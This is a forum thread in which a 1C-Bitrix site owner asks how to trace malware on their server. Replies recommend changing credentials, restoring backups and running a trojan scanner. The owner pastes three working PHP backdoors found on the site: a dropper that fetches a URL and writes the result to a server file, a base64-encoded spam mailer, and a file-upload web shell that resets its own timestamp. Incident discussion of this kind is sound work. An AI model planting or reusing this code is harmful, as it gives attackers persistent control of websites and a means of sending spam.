How to track a virus on a website?

D

DYLAN2019-05-17 12:45:35

1C-Bitrix

DYLAN, 2019-05-17 12:45:35

There is a site on Bitrix installed on VDS recently found a strange code in index.php, the code is encrypted php and various files like
hh.ru
mama332.php
wp-cron-sample.php
, etc. appear with it. the contents of the files are as follows

<?php
function class_x_i($x = ''){
$urlset = isset($_GET['name']) ? trim($_GET['name']) : '';
$filename = isset($_GET['file']) ? trim($_GET['file']) : '';
$ch = curl_init('http://'.$urlset);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
file_put_contents($filename,$result);
echo 'O1024K';
}
class_x_i();
?>

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
  {
  echo "indata_error";
  exit;
  }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
  echo "sent_ok";
else
  echo "sent_error";
?>

How can you trace the source that initiates the creation of these files?
1. You can log all requests to the site and, if these files are found again, track a possible connection with some requests. Because the virus can log in to the site using a certain script.
2. I checked the cron, I didn’t find anything criminal, just running cron_events.php in it is also all standard.
3. I didn’t find anything in the Bitrix agents either, at the time these files appeared, not a single agent was running

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

A

Anton Shamanov, 2019-05-17
@SilenceOfWinter

change passwords, update software, transfer the admin panel, Casper and the web have online verification

Y

Yaroslav Alexandrov, 2019-05-17
@alexyarik

You do not need to look for a source now, but to do prevention:
1) Connect an antivirus to the VDS service on the hosting, set up a daily check, check the account files.
2) Change all accesses: website, database, ftp (ssh), hosting panel
3) Restore the site from a backup dated before the hack
4) If there is no backup, then install the module from the "Trojan Search" marketplace and drive the site if there are infected system files, reload Bitrix core and modules

D

DYLAN, 2019-05-17
@ermolaev_nikita

logs tracked a certain license.php file through which files were loaded

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#[email protected][email protected]#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
  {
  move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
  $file = $_FILES/*;*/["filename"]["name"];
  echo "<a href=\"$file\">$file</a>";
  } else {
  echo("empty");
  }
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>

However, the date of creation is not known to him, so it is impossible to understand exactly when the infection occurred and through what =((
using the solution "Search for Trojans" from the market place, I found a bunch of files with encrypted php code, replaced all passwords, we will wait